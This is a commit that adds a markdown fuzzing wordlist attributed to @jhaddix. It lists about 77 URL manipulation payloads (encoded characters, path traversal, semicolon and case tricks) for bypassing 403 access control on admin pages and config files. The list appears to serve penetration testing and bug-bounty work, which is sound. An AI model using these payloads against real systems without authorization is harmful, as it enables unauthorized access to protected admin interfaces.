Create 403.md

Fuzzing/403/403.md

@@ -0,0 +1,85 @@
+# 403 Bypass list by @jhaddix
+
+## Url Manipulation Methods
+
+Below are the top 77 ways to bypass access control on incorrectely protected pages. These work best on config files and global dashboards. 
+
+```
+url.com/admin/?
+url.com//admin//
+url.com///admin///
+url.com/./admin/./
+url.com/admin?
+url.com/admin??
+url.com/admin??
+url.com/admin/?/
+url.com/admin/??
+url.com/admin/??/
+url.com/admin/..
+url.com/admin/../
+url.com/admin/./
+url.com/admin/.
+url.com/admin/.//
+url.com/admin/*
+url.com/admin//*
+url.com/admin/%2f
+url.com/admin/%2f/
+url.com/admin/%20
+url.com/admin/%20/
+url.com/admin/%09
+url.com/admin/%09/
+url.com/admin/%0a
+url.com/admin/%0a/
+url.com/admin/%0d
+url.com/admin/%0d/
+url.com/admin/%25
+url.com/admin/%25/
+url.com/admin/%23
+url.com/admin/%23/
+url.com/admin/%26
+url.com/admin/%3f
+url.com/admin/%3f/
+url.com/admin/%26/
+url.com/admin/#
+url.com/admin/#/
+url.com/admin/#/./
+url.com/./admin
+url.com/./admin/
+url.com/..;/admin
+url.com/..;/admin/
+url.com/.;/admin
+url.com/.;/admin/
+url.com/;/admin
+url.com/;/admin/
+url.com//;//admin
+url.com//;//admin/
+url.com/admin/./
+url.com/%2e/admin
+url.com/%2e/admin/
+url.com/%20/admin/%20
+url.com/%20/admin/%20/
+url.com/admin/..;/
+url.com/admin.json
+url.com/admin/.json
+url.com/admin..;/
+url.com/admin;/
+url.com/admin%00
+url.com/admin.css
+url.com/admin.html
+url.com/admin?id=1
+url.com/admin~
+url.com/admin/~
+url.com/admin/°/
+url.com/admin/&
+url.com/admin/-
+url.com/admin\/\/
+url.com/admin/..%3B/
+url.com/admin/;%2f..%2f..%2f
+url.com/ADMIN
+url.com/ADMIN/
+url.com/admin/..\;/
+url.com/*/admin
+url.com/*/admin/
+url.com/ADM+IN
+url.com/ADM+IN/
+```